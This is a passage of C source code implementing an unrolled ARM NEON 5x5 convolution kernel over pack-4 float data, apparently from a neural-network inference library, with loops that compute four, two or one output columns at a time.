float32x4_t _r54 = vld1q_f32(r5+16);
float32x4_t _r55 = vld1q_f32(r5+20);
float32x4_t _r56 = vld1q_f32(r5+24);
float32x4_t _r57 = vld1q_f32(r5+28);
_sum10 = vmlaq_f32(_sum10, _k40, _r50);
_sum10 = vmlaq_f32(_sum10, _k41, _r51);
_sum10 = vmlaq_f32(_sum10, _k42, _r52);
_sum10 = vmlaq_f32(_sum10, _k43, _r53);
_sum10 = vmlaq_f32(_sum10, _k44, _r54);
_sum11 = vmlaq_f32(_sum11, _k40, _r51);
_sum11 = vmlaq_f32(_sum11, _k41, _r52);
_sum11 = vmlaq_f32(_sum11, _k42, _r53);
_sum11 = vmlaq_f32(_sum11, _k43, _r54);
_sum11 = vmlaq_f32(_sum11, _k44, _r55);
_sum12 = vmlaq_f32(_sum12, _k40, _r52);
_sum12 = vmlaq_f32(_sum12, _k41, _r53);
_sum12 = vmlaq_f32(_sum12, _k42, _r54);
_sum12 = vmlaq_f32(_sum12, _k43, _r55);
_sum12 = vmlaq_f32(_sum12, _k44, _r56);
_sum13 = vmlaq_f32(_sum13, _k40, _r53);
_sum13 = vmlaq_f32(_sum13, _k41, _r54);
_sum13 = vmlaq_f32(_sum13, _k42, _r55);
_sum13 = vmlaq_f32(_sum13, _k43, _r56);
_sum13 = vmlaq_f32(_sum13, _k44, _r57);
vst1q_f32(outptr0, _sum00);
vst1q_f32(outptr0+4, _sum01);
vst1q_f32(outptr0+8, _sum02);
vst1q_f32(outptr0+12, _sum03);
vst1q_f32(outptr1, _sum10);
vst1q_f32(outptr1+4, _sum11);
vst1q_f32(outptr1+8, _sum12);
vst1q_f32(outptr1+12, _sum13);
r0 += 16;
r1 += 16;
r2 += 16;
r3 += 16;
r4 += 16;
r5 += 16;
outptr0 += 16;
outptr1 += 16;
}
for (; j+1 < outw; j+=2)
{
float32x4_t _sum00 = _bias0;
float32x4_t _sum01 = _bias0;
float32x4_t _sum10 = _bias0;
float32x4_t _sum11 = _bias0;
float32x4_t _r00 = vld1q_f32(r0);
float32x4_t _r01 = vld1q_f32(r0+4);
float32x4_t _r02 = vld1q_f32(r0+8);
float32x4_t _r03 = vld1q_f32(r0+12);
float32x4_t _r04 = vld1q_f32(r0+16);
float32x4_t _r05 = vld1q_f32(r0+20);
float32x4_t _k00 = vld1q_f32(k0);
float32x4_t _k01 = vld1q_f32(k0+4);
float32x4_t _k02 = vld1q_f32(k0+8);
float32x4_t _k03 = vld1q_f32(k0+12);
float32x4_t _k04 = vld1q_f32(k0+16);
k0 += 20;
_sum00 = vmlaq_f32(_sum00, _k00, _r00);
_sum00 = vmlaq_f32(_sum00, _k01, _r01);
_sum00 = vmlaq_f32(_sum00, _k02, _r02);
_sum00 = vmlaq_f32(_sum00, _k03, _r03);
_sum00 = vmlaq_f32(_sum00, _k04, _r04);
_sum01 = vmlaq_f32(_sum01, _k00, _r01);
_sum01 = vmlaq_f32(_sum01, _k01, _r02);
_sum01 = vmlaq_f32(_sum01, _k02, _r03);
_sum01 = vmlaq_f32(_sum01, _k03, _r04);
_sum01 = vmlaq_f32(_sum01, _k04, _r05);
float32x4_t _r10 = vld1q_f32(r1);
float32x4_t _r11 = vld1q_f32(r1+4);
float32x4_t _r12 = vld1q_f32(r1+8);
float32x4_t _r13 = vld1q_f32(r1+12);
float32x4_t _r14 = vld1q_f32(r1+16);
float32x4_t _r15 = vld1q_f32(r1+20);
float32x4_t _k10 = vld1q_f32(k0);
float32x4_t _k11 = vld1q_f32(k0+4);
float32x4_t _k12 = vld1q_f32(k0+8);
float32x4_t _k13 = vld1q_f32(k0+12);
float32x4_t _k14 = vld1q_f32(k0+16);
k0 += 20;
_sum10 = vmlaq_f32(_sum10, _k00, _r10);
_sum10 = vmlaq_f32(_sum10, _k01, _r11);
_sum10 = vmlaq_f32(_sum10, _k02, _r12);
_sum10 = vmlaq_f32(_sum10, _k03, _r13);
_sum10 = vmlaq_f32(_sum10, _k04, _r14);
_sum11 = vmlaq_f32(_sum11, _k00, _r11);
_sum11 = vmlaq_f32(_sum11, _k01, _r12);
_sum11 = vmlaq_f32(_sum11, _k02, _r13);
_sum11 = vmlaq_f32(_sum11, _k03, _r14);
_sum11 = vmlaq_f32(_sum11, _k04, _r15);
_sum00 = vmlaq_f32(_sum00, _k10, _r10);
_sum00 = vmlaq_f32(_sum00, _k11, _r11);
_sum00 = vmlaq_f32(_sum00, _k12, _r12);
_sum00 = vmlaq_f32(_sum00, _k13, _r13);
_sum00 = vmlaq_f32(_sum00, _k14, _r14);
_sum01 = vmlaq_f32(_sum01, _k10, _r11);
_sum01 = vmlaq_f32(_sum01, _k11, _r12);
_sum01 = vmlaq_f32(_sum01, _k12, _r13);
_sum01 = vmlaq_f32(_sum01, _k13, _r14);
_sum01 = vmlaq_f32(_sum01, _k14, _r15);
float32x4_t _r20 = vld1q_f32(r2);
float32x4_t _r21 = vld1q_f32(r2+4);
float32x4_t _r22 = vld1q_f32(r2+8);
float32x4_t _r23 = vld1q_f32(r2+12);
float32x4_t _r24 = vld1q_f32(r2+16);
float32x4_t _r25 = vld1q_f32(r2+20);
float32x4_t _k20 = vld1q_f32(k0);
float32x4_t _k21 = vld1q_f32(k0+4);
float32x4_t _k22 = vld1q_f32(k0+8);
float32x4_t _k23 = vld1q_f32(k0+12);
float32x4_t _k24 = vld1q_f32(k0+16);
k0 += 20;
_sum10 = vmlaq_f32(_sum10, _k10, _r20);
_sum10 = vmlaq_f32(_sum10, _k11, _r21);
_sum10 = vmlaq_f32(_sum10, _k12, _r22);
_sum10 = vmlaq_f32(_sum10, _k13, _r23);
_sum10 = vmlaq_f32(_sum10, _k14, _r24);
_sum11 = vmlaq_f32(_sum11, _k10, _r21);
_sum11 = vmlaq_f32(_sum11, _k11, _r22);
_sum11 = vmlaq_f32(_sum11, _k12, _r23);
_sum11 = vmlaq_f32(_sum11, _k13, _r24);
_sum11 = vmlaq_f32(_sum11, _k14, _r25);
_sum00 = vmlaq_f32(_sum00, _k20, _r20);
_sum00 = vmlaq_f32(_sum00, _k21, _r21);
_sum00 = vmlaq_f32(_sum00, _k22, _r22);
_sum00 = vmlaq_f32(_sum00, _k23, _r23);
_sum00 = vmlaq_f32(_sum00, _k24, _r24);
_sum01 = vmlaq_f32(_sum01, _k20, _r21);
_sum01 = vmlaq_f32(_sum01, _k21, _r22);
_sum01 = vmlaq_f32(_sum01, _k22, _r23);
_sum01 = vmlaq_f32(_sum01, _k23, _r24);
_sum01 = vmlaq_f32(_sum01, _k24, _r25);
float32x4_t _r30 = vld1q_f32(r3);
float32x4_t _r31 = vld1q_f32(r3+4);
float32x4_t _r32 = vld1q_f32(r3+8);
float32x4_t _r33 = vld1q_f32(r3+12);
float32x4_t _r34 = vld1q_f32(r3+16);
float32x4_t _r35 = vld1q_f32(r3+20);
float32x4_t _k30 = vld1q_f32(k0);
float32x4_t _k31 = vld1q_f32(k0+4);
float32x4_t _k32 = vld1q_f32(k0+8);
float32x4_t _k33 = vld1q_f32(k0+12);
float32x4_t _k34 = vld1q_f32(k0+16);
k0 += 20;
_sum10 = vmlaq_f32(_sum10, _k20, _r30);
_sum10 = vmlaq_f32(_sum10, _k21, _r31);
_sum10 = vmlaq_f32(_sum10, _k22, _r32);
_sum10 = vmlaq_f32(_sum10, _k23, _r33);
_sum10 = vmlaq_f32(_sum10, _k24, _r34);
_sum11 = vmlaq_f32(_sum11, _k20, _r31);
_sum11 = vmlaq_f32(_sum11, _k21, _r32);
_sum11 = vmlaq_f32(_sum11, _k22, _r33);
_sum11 = vmlaq_f32(_sum11, _k23, _r34);
_sum11 = vmlaq_f32(_sum11, _k24, _r35);
_sum00 = vmlaq_f32(_sum00, _k30, _r30);
_sum00 = vmlaq_f32(_sum00, _k31, _r31);
_sum00 = vmlaq_f32(_sum00, _k32, _r32);
_sum00 = vmlaq_f32(_sum00, _k33, _r33);
_sum00 = vmlaq_f32(_sum00, _k34, _r34);
_sum01 = vmlaq_f32(_sum01, _k30, _r31);
_sum01 = vmlaq_f32(_sum01, _k31, _r32);
_sum01 = vmlaq_f32(_sum01, _k32, _r33);
_sum01 = vmlaq_f32(_sum01, _k33, _r34);
_sum01 = vmlaq_f32(_sum01, _k34, _r35);
float32x4_t _r40 = vld1q_f32(r4);
float32x4_t _r41 = vld1q_f32(r4+4);
float32x4_t _r42 = vld1q_f32(r4+8);
float32x4_t _r43 = vld1q_f32(r4+12);
float32x4_t _r44 = vld1q_f32(r4+16);
float32x4_t _r45 = vld1q_f32(r4+20);
float32x4_t _k40 = vld1q_f32(k0);
float32x4_t _k41 = vld1q_f32(k0+4);
float32x4_t _k42 = vld1q_f32(k0+8);
float32x4_t _k43 = vld1q_f32(k0+12);
float32x4_t _k44 = vld1q_f32(k0+16);
k0 -= 80;
_sum10 = vmlaq_f32(_sum10, _k30, _r40);
_sum10 = vmlaq_f32(_sum10, _k31, _r41);
_sum10 = vmlaq_f32(_sum10, _k32, _r42);
_sum10 = vmlaq_f32(_sum10, _k33, _r43);
_sum10 = vmlaq_f32(_sum10, _k34, _r44);
_sum11 = vmlaq_f32(_sum11, _k30, _r41);
_sum11 = vmlaq_f32(_sum11, _k31, _r42);
_sum11 = vmlaq_f32(_sum11, _k32, _r43);
_sum11 = vmlaq_f32(_sum11, _k33, _r44);
_sum11 = vmlaq_f32(_sum11, _k34, _r45);
_sum00 = vmlaq_f32(_sum00, _k40, _r40);
_sum00 = vmlaq_f32(_sum00, _k41, _r41);
_sum00 = vmlaq_f32(_sum00, _k42, _r42);
_sum00 = vmlaq_f32(_sum00, _k43, _r43);
_sum00 = vmlaq_f32(_sum00, _k44, _r44);
_sum01 = vmlaq_f32(_sum01, _k40, _r41);
_sum01 = vmlaq_f32(_sum01, _k41, _r42);
_sum01 = vmlaq_f32(_sum01, _k42, _r43);
_sum01 = vmlaq_f32(_sum01, _k43, _r44);
_sum01 = vmlaq_f32(_sum01, _k44, _r45);
float32x4_t _r50 = vld1q_f32(r5);
float32x4_t _r51 = vld1q_f32(r5+4);
float32x4_t _r52 = vld1q_f32(r5+8);
float32x4_t _r53 = vld1q_f32(r5+12);
float32x4_t _r54 = vld1q_f32(r5+16);
float32x4_t _r55 = vld1q_f32(r5+20);
_sum10 = vmlaq_f32(_sum10, _k40, _r50);
_sum10 = vmlaq_f32(_sum10, _k41, _r51);
_sum10 = vmlaq_f32(_sum10, _k42, _r52);
_sum10 = vmlaq_f32(_sum10, _k43, _r53);
_sum10 = vmlaq_f32(_sum10, _k44, _r54);
_sum11 = vmlaq_f32(_sum11, _k40, _r51);
_sum11 = vmlaq_f32(_sum11, _k41, _r52);
_sum11 = vmlaq_f32(_sum11, _k42, _r53);
_sum11 = vmlaq_f32(_sum11, _k43, _r54);
_sum11 = vmlaq_f32(_sum11, _k44, _r55);
vst1q_f32(outptr0, _sum00);
vst1q_f32(outptr0+4, _sum01);
vst1q_f32(outptr1, _sum10);
vst1q_f32(outptr1+4, _sum11);
r0 += 8;
r1 += 8;
r2 += 8;
r3 += 8;
r4 += 8;
r5 += 8;
outptr0 += 8;
outptr1 += 8;
}
for (; j < outw; j++)
{
float32x4_t _sum0 = _bias0;
float32x4_t _sum1 = _bias0;
float32x4_t _r00 = vld1q_f32(r0);
float32x4_t _r01 = vld1q_f32(r0+4);
float32x4_t _r02 = vld1q_f32(r0+8);
float32x4_t _r03 = vld1q_f32(r0+12);
float32x4_t _r04 = vld1q_f32(r0+16);
float32x4_t _k00 = vld1q_f32(k0);
float32x4_t _k01 = vld1q_f32(k0+4);
float32x4_t _k02 = vld1q_f32(k0+8);
float32x4_t _k03 = vld1q_f32(k0+12);
float32x4_t _k04 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k00, _r00);
_sum0 = vmlaq_f32(_sum0, _k01, _r01);
_sum0 = vmlaq_f32(_sum0, _k02, _r02);
_sum0 = vmlaq_f32(_sum0, _k03, _r03);
_sum0 = vmlaq_f32(_sum0, _k04, _r04);
float32x4_t _r10 = vld1q_f32(r1);
float32x4_t _r11 = vld1q_f32(r1+4);
float32x4_t _r12 = vld1q_f32(r1+8);
float32x4_t _r13 = vld1q_f32(r1+12);
float32x4_t _r14 = vld1q_f32(r1+16);
float32x4_t _k10 = vld1q_f32(k0);
float32x4_t _k11 = vld1q_f32(k0+4);
float32x4_t _k12 = vld1q_f32(k0+8);
float32x4_t _k13 = vld1q_f32(k0+12);
float32x4_t _k14 = vld1q_f32(k0+16);
k0 += 20;
_sum1 = vmlaq_f32(_sum1, _k00, _r10);
_sum1 = vmlaq_f32(_sum1, _k01, _r11);
_sum1 = vmlaq_f32(_sum1, _k02, _r12);
_sum1 = vmlaq_f32(_sum1, _k03, _r13);
_sum1 = vmlaq_f32(_sum1, _k04, _r14);
_sum0 = vmlaq_f32(_sum0, _k10, _r10);
_sum0 = vmlaq_f32(_sum0, _k11, _r11);
_sum0 = vmlaq_f32(_sum0, _k12, _r12);
_sum0 = vmlaq_f32(_sum0, _k13, _r13);
_sum0 = vmlaq_f32(_sum0, _k14, _r14);
float32x4_t _r20 = vld1q_f32(r2);
float32x4_t _r21 = vld1q_f32(r2+4);
float32x4_t _r22 = vld1q_f32(r2+8);
float32x4_t _r23 = vld1q_f32(r2+12);
float32x4_t _r24 = vld1q_f32(r2+16);
float32x4_t _k20 = vld1q_f32(k0);
float32x4_t _k21 = vld1q_f32(k0+4);
float32x4_t _k22 = vld1q_f32(k0+8);
float32x4_t _k23 = vld1q_f32(k0+12);
float32x4_t _k24 = vld1q_f32(k0+16);
k0 += 20;
_sum1 = vmlaq_f32(_sum1, _k10, _r20);
_sum1 = vmlaq_f32(_sum1, _k11, _r21);
_sum1 = vmlaq_f32(_sum1, _k12, _r22);
_sum1 = vmlaq_f32(_sum1, _k13, _r23);
_sum1 = vmlaq_f32(_sum1, _k14, _r24);
_sum0 = vmlaq_f32(_sum0, _k20, _r20);
_sum0 = vmlaq_f32(_sum0, _k21, _r21);
_sum0 = vmlaq_f32(_sum0, _k22, _r22);
_sum0 = vmlaq_f32(_sum0, _k23, _r23);
_sum0 = vmlaq_f32(_sum0, _k24, _r24);
float32x4_t _r30 = vld1q_f32(r3);
float32x4_t _r31 = vld1q_f32(r3+4);
float32x4_t _r32 = vld1q_f32(r3+8);
float32x4_t _r33 = vld1q_f32(r3+12);
float32x4_t _r34 = vld1q_f32(r3+16);
float32x4_t _k30 = vld1q_f32(k0);
float32x4_t _k31 = vld1q_f32(k0+4);
float32x4_t _k32 = vld1q_f32(k0+8);
float32x4_t _k33 = vld1q_f32(k0+12);
float32x4_t _k34 = vld1q_f32(k0+16);
k0 += 20;
_sum1 = vmlaq_f32(_sum1, _k20, _r30);
_sum1 = vmlaq_f32(_sum1, _k21, _r31);
_sum1 = vmlaq_f32(_sum1, _k22, _r32);
_sum1 = vmlaq_f32(_sum1, _k23, _r33);
_sum1 = vmlaq_f32(_sum1, _k24, _r34);
_sum0 = vmlaq_f32(_sum0, _k30, _r30);
_sum0 = vmlaq_f32(_sum0, _k31, _r31);
_sum0 = vmlaq_f32(_sum0, _k32, _r32);
_sum0 = vmlaq_f32(_sum0, _k33, _r33);
_sum0 = vmlaq_f32(_sum0, _k34, _r34);
float32x4_t _r40 = vld1q_f32(r4);
float32x4_t _r41 = vld1q_f32(r4+4);
float32x4_t _r42 = vld1q_f32(r4+8);
float32x4_t _r43 = vld1q_f32(r4+12);
float32x4_t _r44 = vld1q_f32(r4+16);
float32x4_t _k40 = vld1q_f32(k0);
float32x4_t _k41 = vld1q_f32(k0+4);
float32x4_t _k42 = vld1q_f32(k0+8);
float32x4_t _k43 = vld1q_f32(k0+12);
float32x4_t _k44 = vld1q_f32(k0+16);
k0 -= 80;
_sum1 = vmlaq_f32(_sum1, _k30, _r40);
_sum1 = vmlaq_f32(_sum1, _k31, _r41);
_sum1 = vmlaq_f32(_sum1, _k32, _r42);
_sum1 = vmlaq_f32(_sum1, _k33, _r43);
_sum1 = vmlaq_f32(_sum1, _k34, _r44);
_sum0 = vmlaq_f32(_sum0, _k40, _r40);
_sum0 = vmlaq_f32(_sum0, _k41, _r41);
_sum0 = vmlaq_f32(_sum0, _k42, _r42);
_sum0 = vmlaq_f32(_sum0, _k43, _r43);
_sum0 = vmlaq_f32(_sum0, _k44, _r44);
float32x4_t _r50 = vld1q_f32(r5);
float32x4_t _r51 = vld1q_f32(r5+4);
float32x4_t _r52 = vld1q_f32(r5+8);
float32x4_t _r53 = vld1q_f32(r5+12);
float32x4_t _r54 = vld1q_f32(r5+16);
_sum1 = vmlaq_f32(_sum1, _k40, _r50);
_sum1 = vmlaq_f32(_sum1, _k41, _r51);
_sum1 = vmlaq_f32(_sum1, _k42, _r52);
_sum1 = vmlaq_f32(_sum1, _k43, _r53);
_sum1 = vmlaq_f32(_sum1, _k44, _r54);
vst1q_f32(outptr0, _sum0);
vst1q_f32(outptr1, _sum1);
r0 += 4;
r1 += 4;
r2 += 4;
r3 += 4;
r4 += 4;
r5 += 4;
outptr0 += 4;
outptr1 += 4;
}
r0 += 4*4 + w*4;
r1 += 4*4 + w*4;
r2 += 4*4 + w*4;
r3 += 4*4 + w*4;
r4 += 4*4 + w*4;
r5 += 4*4 + w*4;
outptr0 += outw*4;
outptr1 += outw*4;
}
#endif // __aarch64__
for (; i < outh; i++)
{
int j = 0;
for (; j+3 < outw; j+=4)
{
float32x4_t _sum0 = _bias0;
float32x4_t _sum1 = _bias0;
float32x4_t _sum2 = _bias0;
float32x4_t _sum3 = _bias0;
float32x4_t _r00 = vld1q_f32(r0);
float32x4_t _r01 = vld1q_f32(r0+4);
float32x4_t _r02 = vld1q_f32(r0+8);
float32x4_t _r03 = vld1q_f32(r0+12);
float32x4_t _r04 = vld1q_f32(r0+16);
float32x4_t _r05 = vld1q_f32(r0+20);
float32x4_t _r06 = vld1q_f32(r0+24);
float32x4_t _r07 = vld1q_f32(r0+28);
float32x4_t _k00 = vld1q_f32(k0);
float32x4_t _k01 = vld1q_f32(k0+4);
float32x4_t _k02 = vld1q_f32(k0+8);
float32x4_t _k03 = vld1q_f32(k0+12);
float32x4_t _k04 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k00, _r00);
_sum0 = vmlaq_f32(_sum0, _k01, _r01);
_sum0 = vmlaq_f32(_sum0, _k02, _r02);
_sum0 = vmlaq_f32(_sum0, _k03, _r03);
_sum0 = vmlaq_f32(_sum0, _k04, _r04);
_sum1 = vmlaq_f32(_sum1, _k00, _r01);
_sum1 = vmlaq_f32(_sum1, _k01, _r02);
_sum1 = vmlaq_f32(_sum1, _k02, _r03);
_sum1 = vmlaq_f32(_sum1, _k03, _r04);
_sum1 = vmlaq_f32(_sum1, _k04, _r05);
_sum2 = vmlaq_f32(_sum2, _k00, _r02);
_sum2 = vmlaq_f32(_sum2, _k01, _r03);
_sum2 = vmlaq_f32(_sum2, _k02, _r04);
_sum2 = vmlaq_f32(_sum2, _k03, _r05);
_sum2 = vmlaq_f32(_sum2, _k04, _r06);
_sum3 = vmlaq_f32(_sum3, _k00, _r03);
_sum3 = vmlaq_f32(_sum3, _k01, _r04);
_sum3 = vmlaq_f32(_sum3, _k02, _r05);
_sum3 = vmlaq_f32(_sum3, _k03, _r06);
_sum3 = vmlaq_f32(_sum3, _k04, _r07);
float32x4_t _r10 = vld1q_f32(r1);
float32x4_t _r11 = vld1q_f32(r1+4);
float32x4_t _r12 = vld1q_f32(r1+8);
float32x4_t _r13 = vld1q_f32(r1+12);
float32x4_t _r14 = vld1q_f32(r1+16);
float32x4_t _r15 = vld1q_f32(r1+20);
float32x4_t _r16 = vld1q_f32(r1+24);
float32x4_t _r17 = vld1q_f32(r1+28);
float32x4_t _k10 = vld1q_f32(k0);
float32x4_t _k11 = vld1q_f32(k0+4);
float32x4_t _k12 = vld1q_f32(k0+8);
float32x4_t _k13 = vld1q_f32(k0+12);
float32x4_t _k14 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k10, _r10);
_sum0 = vmlaq_f32(_sum0, _k11, _r11);
_sum0 = vmlaq_f32(_sum0, _k12, _r12);
_sum0 = vmlaq_f32(_sum0, _k13, _r13);
_sum0 = vmlaq_f32(_sum0, _k14, _r14);
_sum1 = vmlaq_f32(_sum1, _k10, _r11);
_sum1 = vmlaq_f32(_sum1, _k11, _r12);
_sum1 = vmlaq_f32(_sum1, _k12, _r13);
_sum1 = vmlaq_f32(_sum1, _k13, _r14);
_sum1 = vmlaq_f32(_sum1, _k14, _r15);
_sum2 = vmlaq_f32(_sum2, _k10, _r12);
_sum2 = vmlaq_f32(_sum2, _k11, _r13);
_sum2 = vmlaq_f32(_sum2, _k12, _r14);
_sum2 = vmlaq_f32(_sum2, _k13, _r15);
_sum2 = vmlaq_f32(_sum2, _k14, _r16);
_sum3 = vmlaq_f32(_sum3, _k10, _r13);
_sum3 = vmlaq_f32(_sum3, _k11, _r14);
_sum3 = vmlaq_f32(_sum3, _k12, _r15);
_sum3 = vmlaq_f32(_sum3, _k13, _r16);
_sum3 = vmlaq_f32(_sum3, _k14, _r17);
float32x4_t _r20 = vld1q_f32(r2);
float32x4_t _r21 = vld1q_f32(r2+4);
float32x4_t _r22 = vld1q_f32(r2+8);
float32x4_t _r23 = vld1q_f32(r2+12);
float32x4_t _r24 = vld1q_f32(r2+16);
float32x4_t _r25 = vld1q_f32(r2+20);
float32x4_t _r26 = vld1q_f32(r2+24);
float32x4_t _r27 = vld1q_f32(r2+28);
float32x4_t _k20 = vld1q_f32(k0);
float32x4_t _k21 = vld1q_f32(k0+4);
float32x4_t _k22 = vld1q_f32(k0+8);
float32x4_t _k23 = vld1q_f32(k0+12);
float32x4_t _k24 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k20, _r20);
_sum0 = vmlaq_f32(_sum0, _k21, _r21);
_sum0 = vmlaq_f32(_sum0, _k22, _r22);
_sum0 = vmlaq_f32(_sum0, _k23, _r23);
_sum0 = vmlaq_f32(_sum0, _k24, _r24);
_sum1 = vmlaq_f32(_sum1, _k20, _r21);
_sum1 = vmlaq_f32(_sum1, _k21, _r22);
_sum1 = vmlaq_f32(_sum1, _k22, _r23);
_sum1 = vmlaq_f32(_sum1, _k23, _r24);
_sum1 = vmlaq_f32(_sum1, _k24, _r25);
_sum2 = vmlaq_f32(_sum2, _k20, _r22);
_sum2 = vmlaq_f32(_sum2, _k21, _r23);
_sum2 = vmlaq_f32(_sum2, _k22, _r24);
_sum2 = vmlaq_f32(_sum2, _k23, _r25);
_sum2 = vmlaq_f32(_sum2, _k24, _r26);
_sum3 = vmlaq_f32(_sum3, _k20, _r23);
_sum3 = vmlaq_f32(_sum3, _k21, _r24);
_sum3 = vmlaq_f32(_sum3, _k22, _r25);
_sum3 = vmlaq_f32(_sum3, _k23, _r26);
_sum3 = vmlaq_f32(_sum3, _k24, _r27);
float32x4_t _r30 = vld1q_f32(r3);
float32x4_t _r31 = vld1q_f32(r3+4);
float32x4_t _r32 = vld1q_f32(r3+8);
float32x4_t _r33 = vld1q_f32(r3+12);
float32x4_t _r34 = vld1q_f32(r3+16);
float32x4_t _r35 = vld1q_f32(r3+20);
float32x4_t _r36 = vld1q_f32(r3+24);
float32x4_t _r37 = vld1q_f32(r3+28);
float32x4_t _k30 = vld1q_f32(k0);
float32x4_t _k31 = vld1q_f32(k0+4);
float32x4_t _k32 = vld1q_f32(k0+8);
float32x4_t _k33 = vld1q_f32(k0+12);
float32x4_t _k34 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k30, _r30);
_sum0 = vmlaq_f32(_sum0, _k31, _r31);
_sum0 = vmlaq_f32(_sum0, _k32, _r32);
_sum0 = vmlaq_f32(_sum0, _k33, _r33);
_sum0 = vmlaq_f32(_sum0, _k34, _r34);
_sum1 = vmlaq_f32(_sum1, _k30, _r31);
_sum1 = vmlaq_f32(_sum1, _k31, _r32);
_sum1 = vmlaq_f32(_sum1, _k32, _r33);
_sum1 = vmlaq_f32(_sum1, _k33, _r34);
_sum1 = vmlaq_f32(_sum1, _k34, _r35);
_sum2 = vmlaq_f32(_sum2, _k30, _r32);
_sum2 = vmlaq_f32(_sum2, _k31, _r33);
_sum2 = vmlaq_f32(_sum2, _k32, _r34);
_sum2 = vmlaq_f32(_sum2, _k33, _r35);
_sum2 = vmlaq_f32(_sum2, _k34, _r36);
_sum3 = vmlaq_f32(_sum3, _k30, _r33);
_sum3 = vmlaq_f32(_sum3, _k31, _r34);
_sum3 = vmlaq_f32(_sum3, _k32, _r35);
_sum3 = vmlaq_f32(_sum3, _k33, _r36);
_sum3 = vmlaq_f32(_sum3, _k34, _r37);
float32x4_t _r40 = vld1q_f32(r4);
float32x4_t _r41 = vld1q_f32(r4+4);
float32x4_t _r42 = vld1q_f32(r4+8);
float32x4_t _r43 = vld1q_f32(r4+12);
float32x4_t _r44 = vld1q_f32(r4+16);
float32x4_t _r45 = vld1q_f32(r4+20);
float32x4_t _r46 = vld1q_f32(r4+24);
float32x4_t _r47 = vld1q_f32(r4+28);
float32x4_t _k40 = vld1q_f32(k0);
float32x4_t _k41 = vld1q_f32(k0+4);
float32x4_t _k42 = vld1q_f32(k0+8);
float32x4_t _k43 = vld1q_f32(k0+12);
float32x4_t _k44 = vld1q_f32(k0+16);
k0 -= 80;
_sum0 = vmlaq_f32(_sum0, _k40, _r40);
_sum0 = vmlaq_f32(_sum0, _k41, _r41);
_sum0 = vmlaq_f32(_sum0, _k42, _r42);
_sum0 = vmlaq_f32(_sum0, _k43, _r43);
_sum0 = vmlaq_f32(_sum0, _k44, _r44);
_sum1 = vmlaq_f32(_sum1, _k40, _r41);
_sum1 = vmlaq_f32(_sum1, _k41, _r42);
_sum1 = vmlaq_f32(_sum1, _k42, _r43);
_sum1 = vmlaq_f32(_sum1, _k43, _r44);
_sum1 = vmlaq_f32(_sum1, _k44, _r45);
_sum2 = vmlaq_f32(_sum2, _k40, _r42);
_sum2 = vmlaq_f32(_sum2, _k41, _r43);
_sum2 = vmlaq_f32(_sum2, _k42, _r44);
_sum2 = vmlaq_f32(_sum2, _k43, _r45);
_sum2 = vmlaq_f32(_sum2, _k44, _r46);
_sum3 = vmlaq_f32(_sum3, _k40, _r43);
_sum3 = vmlaq_f32(_sum3, _k41, _r44);
_sum3 = vmlaq_f32(_sum3, _k42, _r45);
_sum3 = vmlaq_f32(_sum3, _k43, _r46);
_sum3 = vmlaq_f32(_sum3, _k44, _r47);
vst1q_f32(outptr0, _sum0);
vst1q_f32(outptr0+4, _sum1);
vst1q_f32(outptr0+8, _sum2);
vst1q_f32(outptr0+12, _sum3);
r0 += 16;
r1 += 16;
r2 += 16;
r3 += 16;
r4 += 16;
outptr0 += 16;
}
for (; j+1 < outw; j+=2)
{
float32x4_t _sum0 = _bias0;
float32x4_t _sum1 = _bias0;
float32x4_t _r00 = vld1q_f32(r0);
float32x4_t _r01 = vld1q_f32(r0+4);
float32x4_t _r02 = vld1q_f32(r0+8);
float32x4_t _r03 = vld1q_f32(r0+12);
float32x4_t _r04 = vld1q_f32(r0+16);
float32x4_t _r05 = vld1q_f32(r0+20);
float32x4_t _k00 = vld1q_f32(k0);
float32x4_t _k01 = vld1q_f32(k0+4);
float32x4_t _k02 = vld1q_f32(k0+8);
float32x4_t _k03 = vld1q_f32(k0+12);
float32x4_t _k04 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k00, _r00);
_sum0 = vmlaq_f32(_sum0, _k01, _r01);
_sum0 = vmlaq_f32(_sum0, _k02, _r02);
_sum0 = vmlaq_f32(_sum0, _k03, _r03);
_sum0 = vmlaq_f32(_sum0, _k04, _r04);
_sum1 = vmlaq_f32(_sum1, _k00, _r01);
_sum1 = vmlaq_f32(_sum1, _k01, _r02);
_sum1 = vmlaq_f32(_sum1, _k02, _r03);
_sum1 = vmlaq_f32(_sum1, _k03, _r04);
_sum1 = vmlaq_f32(_sum1, _k04, _r05);
float32x4_t _r10 = vld1q_f32(r1);
float32x4_t _r11 = vld1q_f32(r1+4);
float32x4_t _r12 = vld1q_f32(r1+8);
float32x4_t _r13 = vld1q_f32(r1+12);
float32x4_t _r14 = vld1q_f32(r1+16);
float32x4_t _r15 = vld1q_f32(r1+20);
float32x4_t _k10 = vld1q_f32(k0);
float32x4_t _k11 = vld1q_f32(k0+4);
float32x4_t _k12 = vld1q_f32(k0+8);
float32x4_t _k13 = vld1q_f32(k0+12);
float32x4_t _k14 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k10, _r10);
_sum0 = vmlaq_f32(_sum0, _k11, _r11);
_sum0 = vmlaq_f32(_sum0, _k12, _r12);
_sum0 = vmlaq_f32(_sum0, _k13, _r13);
_sum0 = vmlaq_f32(_sum0, _k14, _r14);
_sum1 = vmlaq_f32(_sum1, _k10, _r11);
_sum1 = vmlaq_f32(_sum1, _k11, _r12);
_sum1 = vmlaq_f32(_sum1, _k12, _r13);
_sum1 = vmlaq_f32(_sum1, _k13, _r14);
_sum1 = vmlaq_f32(_sum1, _k14, _r15);
float32x4_t _r20 = vld1q_f32(r2);
float32x4_t _r21 = vld1q_f32(r2+4);
float32x4_t _r22 = vld1q_f32(r2+8);
float32x4_t _r23 = vld1q_f32(r2+12);
float32x4_t _r24 = vld1q_f32(r2+16);
float32x4_t _r25 = vld1q_f32(r2+20);
float32x4_t _k20 = vld1q_f32(k0);
float32x4_t _k21 = vld1q_f32(k0+4);
float32x4_t _k22 = vld1q_f32(k0+8);
float32x4_t _k23 = vld1q_f32(k0+12);
float32x4_t _k24 = vld1q_f32(k0+16);
k0 += 20;
